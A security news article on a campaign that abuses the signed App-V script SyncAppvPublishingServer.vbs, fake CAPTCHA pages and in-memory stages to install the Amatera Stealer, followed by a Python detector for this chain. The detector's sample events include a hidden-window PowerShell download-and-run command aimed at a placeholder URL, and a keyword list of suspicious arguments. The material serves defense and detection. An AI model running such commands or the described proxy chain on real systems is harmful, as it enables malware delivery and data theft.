
Windows App-V Scripts Bypass Enterprise Defenses with Infostealer

Summary

– Attackers use fake CAPTCHA pages to trick users into manually executing a command via the Run dialog to install the Amatera Stealer malware.
– The campaign abuses a signed Microsoft script (SyncAppvPublishingServer.vbs) as a Living Off the Land Binary to proxy PowerShell execution through a trusted component.
– The infection chain only works on specific, higher-value corporate systems (like Windows Enterprise/Education) where App-V is present and enabled, and fails on personal or sandboxed systems.
– The malware uses a multi-stage, in-memory process, retrieving payloads from public services like Google Calendar and encrypted PNG files to avoid detection.
– The campaign’s significance lies in its stealthy design, which chains trusted components and in-memory execution to bypass typical security defenses and alerts.

A sophisticated malware campaign is leveraging trusted Windows components to bypass enterprise security measures and deploy a potent information-stealing payload. Security researchers have uncovered a delivery method that cleverly avoids detection by using legitimate Microsoft scripts and user interaction gates. This approach specifically targets high-value corporate systems, making it a significant threat to organizational data security.

The attack begins with a social engineering ploy. Users encounter fake CAPTCHA verification pages designed to trick them into copying and pasting a specific command into the Windows Run dialog. This manual action is a critical part of the infection chain. Instead of directly invoking PowerShell, the supplied command abuses a signed Microsoft script called `SyncAppvPublishingServer.vbs`. This script is normally associated with Application Virtualization (App-V) for managing virtualized enterprise applications. In this campaign, it acts as a trusted conduit to proxy PowerShell execution, effectively hiding malicious activity behind a legitimate Windows component.

The technique relies on a specific environment to succeed. The infection chain utilizes `wscript.exe` and the App-V publishing script, but it only functions on systems where App-V is present and enabled. This typically includes machines running modern Windows Server and Windows 10/11 Enterprise or Education editions, precisely the higher-value systems found in corporate environments. The process will fail on personal computers using Home or Pro installations. Furthermore, the malware includes a check to ensure the command is executed manually by a user; if it detects automated execution in a security sandbox, the infection halts.

Once on a compatible and correctly triggered system, the attack proceeds with a multi-stage, fileless process. An in-memory loader script first pulls data from a public Google Calendar `.ics` file to retrieve instructions for subsequent stages. Next, it fetches a PNG image file that contains an encrypted and compressed PowerShell payload. This payload is also processed entirely in memory, setting the stage for the final act: the retrieval and in-memory execution of the Windows PE payload identified as the Amatera Stealer.

The true danger of this campaign lies not in the final payload, but in its meticulous evasion tactics. By chaining together signed Microsoft components, gating execution based on user behavior, utilizing third-party services like Google Calendar, and maintaining fully in-memory stages, the attackers prioritize stealth and reliability. This methodology allows the malware to slip past environments tuned to detect obvious threats, often succeeding without triggering alarms until after data has been exfiltrated.

To defend against such advanced techniques, a layered security strategy is essential. Beyond user education to recognize fraudulent CAPTCHA pages and potentially restricting access to the Run dialog, organizations should implement robust monitoring. Enabling comprehensive PowerShell logging is crucial for spotting suspicious execution patterns. Additionally, security teams should evaluate the necessity of App-V components on endpoints; removing them where they are not required or configuring alerts for PowerShell execution originating from App-V scripts can help close this specific attack vector. Proactive monitoring for unusual network connections to services like public Google Calendar events can also provide early warning signs of compromise.
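One way to put the "PowerShell originating from App-V scripts" alert into practice, as an added example that is not from the article or from HelpNet Security: a small detector run over constructed process-creation events. The Sysmon-style field names (`image`, `parent_image`, `grandparent_image`, `cmdline`, `parent_cmdline`), the sample events and the argument heuristics are all assumptions; the one fact taken from the article is the chain `wscript.exe` + `SyncAppvPublishingServer.vbs` spawning PowerShell after a command pasted into the Run dialog.

```python
import json

APPV_SCRIPT = "syncappvpublishingserver.vbs"
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Arguments rarely seen in a routine App-V publishing refresh (assumed heuristics, not from the article).
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-enc", "downloadstring", "invoke-webrequest")

# Constructed sample events (JSON lines, Sysmon Event ID 1 style; field names and values are assumptions).
# PLACEHOLDER_* stand in for attacker-controlled values the article does not give.
SAMPLE_EVENTS = r"""
{"pid": 4120, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "grandparent_image": "C:\\Windows\\System32\\userinit.exe", "cmdline": "powershell.exe", "parent_cmdline": "explorer.exe"}
{"pid": 5312, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "grandparent_image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "powershell.exe -NonInteractive -Command Sync-AppvPublishingServer", "parent_cmdline": "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"}
{"pid": 5320, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "grandparent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -w hidden -Command '(New-Object Net.WebClient).DownloadString(PLACEHOLDER_URL)'", "parent_cmdline": "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs PLACEHOLDER_ARGS"}
{"pid": 6000, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "grandparent_image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1", "parent_cmdline": "wscript.exe C:\\Scripts\\launcher.vbs"}
"""


def basename(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (matched, severity, reasons) for one process-creation event."""
    if basename(event["image"]) not in POWERSHELL:
        return False, 0, []
    if basename(event["parent_image"]) not in SCRIPT_HOSTS:
        return False, 0, []
    if APPV_SCRIPT not in event["parent_cmdline"].lower():
        return False, 0, []
    # Base signal from the article: PowerShell proxied through the App-V publishing script.
    # A legitimate publishing refresh also runs this way, so severity 1 means "triage", not "incident".
    severity, reasons = 1, ["PowerShell spawned by SyncAppvPublishingServer.vbs via a script host"]
    # The Run dialog launches its command under explorer.exe; an interactive origin is
    # unusual for a publishing refresh and matches the fake-CAPTCHA delivery in the article.
    if basename(event.get("grandparent_image", "")) == "explorer.exe":
        severity += 1
        reasons.append("script host launched from explorer.exe (interactive, e.g. Run dialog)")
    hits = [a for a in SUSPICIOUS_ARGS if a in event["cmdline"].lower()]
    if hits:
        severity += 1
        reasons.append("suspicious PowerShell arguments: " + ", ".join(hits))
    return True, severity, reasons


def scan(jsonl):
    """Run classify() over JSON-lines events; return [(pid, severity, reasons)] for matches."""
    alerts = []
    for line in filter(None, (l.strip() for l in jsonl.splitlines())):
        event = json.loads(line)
        matched, severity, reasons = classify(event)
        if matched:
            alerts.append((event["pid"], severity, reasons))
    return alerts


if __name__ == "__main__":
    for pid, severity, reasons in scan(SAMPLE_EVENTS):
        print(f"pid={pid} severity={severity}: " + "; ".join(reasons))
```

Only the two events whose parent command line names the App-V script are flagged; the routine refresh scores 1 while the interactive, hidden-window download chain scores 3.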

(Source: HelpNet Security)
